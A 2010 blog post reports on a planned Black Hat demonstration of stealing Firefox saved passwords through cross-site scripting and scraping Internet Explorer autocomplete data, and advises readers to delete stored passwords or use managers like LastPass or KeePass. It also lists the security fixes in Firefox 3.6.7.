His demo will involve getting passwords out of Firefox's Password Manager using "nothing but garden variety Cross-Site Scripting (XSS)," says Grossman, who is founder and CTO of WhiteHat Security and is a co-founder of the Web Application Security Consortium. Execution requires tricking Firefox users into visiting a site hosting the XSS malware, but how hard is that?
As for IE, Grossman will also show attendees of his session how to mine the autocomplete function in IE 6 or 7 to scrape users' first name, last name, aliases, e-mail addresses, physical address, etc.
None of these vulnerabilities are new but that doesn't stop the black hats from using them.
As for the beloved open source Firefox browser, there are a couple of fixes users can take right away. This would be wise to do before every Web application hacker in the nation gets a first-hand demo. One is to simply delete your passwords. The other is to download a Mozilla-approved Firefox add-on such as LastPass Password Manager. Be forewarned, users on the LastPass site say that it crashes Firefox 3.6.6 a lot, particularly on Windows 7.
Alternatively, take the passwords out of the browser altogether and use an open source password manager like KeePass (pictured below, click to enlarge image.) However, KeePass is geared toward Windows users, working natively on just about every Windows operating system out there. But it requires Wine for the free "Classic edition" or "Mono" for the commercial edition. Linux users needing a cross platform password manager will likely want the Linux port, known as KeePassX. This one supports MacOS, too.
Updated July 22: Per the comment from Bill H. below, I found the link to the security updates for Firefox 3.6.7 pushed out on July 20. Several of them discuss fixing vulnerabilities pertaining to Cross Site Scripting (they use the acro CSS on the Mozilla page), though none of the release notes actually mention fixing the hole that allows hackers to grab passwords. Presumably, if the browser is blocking XSS, it will protect against the script that snatches passwords.
I still think it's not a bad idea to use a third-party tool for password protection.
Fixed in Firefox 3.6.7
MFSA 2010-47 Cross-origin data leakage from script filename in error messagesMFSA 2010-46 Cross-domain data theft using CSSMFSA 2010-45 Multiple location bar spoofing vulnerabilitiesMFSA 2010-44 Characters mapped to U+FFFD in 8 bit encodings cause subsequent character to vanishMFSA 2010-43 Same-origin bypass using canvas contextMFSA 2010-42 Cross-origin data disclosure via Web Workers and importScriptsMFSA 2010-41 Remote code execution using malformed PNG imageMFSA 2010-40 nsTreeSelection dangling pointer remote code execution vulnerabilityMFSA 2010-39 nsCSSValue::Array index integer overflowMFSA 2010-38 Arbitrary code execution using SJOW and fast native functionMFSA 2010-37 Plugin parameter EnsureCachedAttrParamArrays remote code execution vulnerabilityMFSA 2010-36 Use-after-free error in NodeIteratorMFSA 2010-35 DOM attribute cloning remote code execution vulnerabilityMFSA 2010-34 Miscellaneous memory safety hazards (rv:220.127.116.11/ 18.104.22.168)
Like this? Here's more:
- All of today's open source news and blogs
- Qbo wants to be the Model T of Robots
- The Open source legal maze: an open trap?
- Extreme CRM Makeover, Open Source Edition - Episode 2, Sweet is Sugar
- Security expert releases Ubuntu Linux distro for malware analysis
- Open Source Business Models Become More Attractive
- Marten Mickos says the cloud won't kill open source
- Subscribe to all Open Source Subnet bloggers.
Follow Julie Bort on Twitter @Julie188
Follow all Open Source Subnet blog posts on Twitter @OSSubnet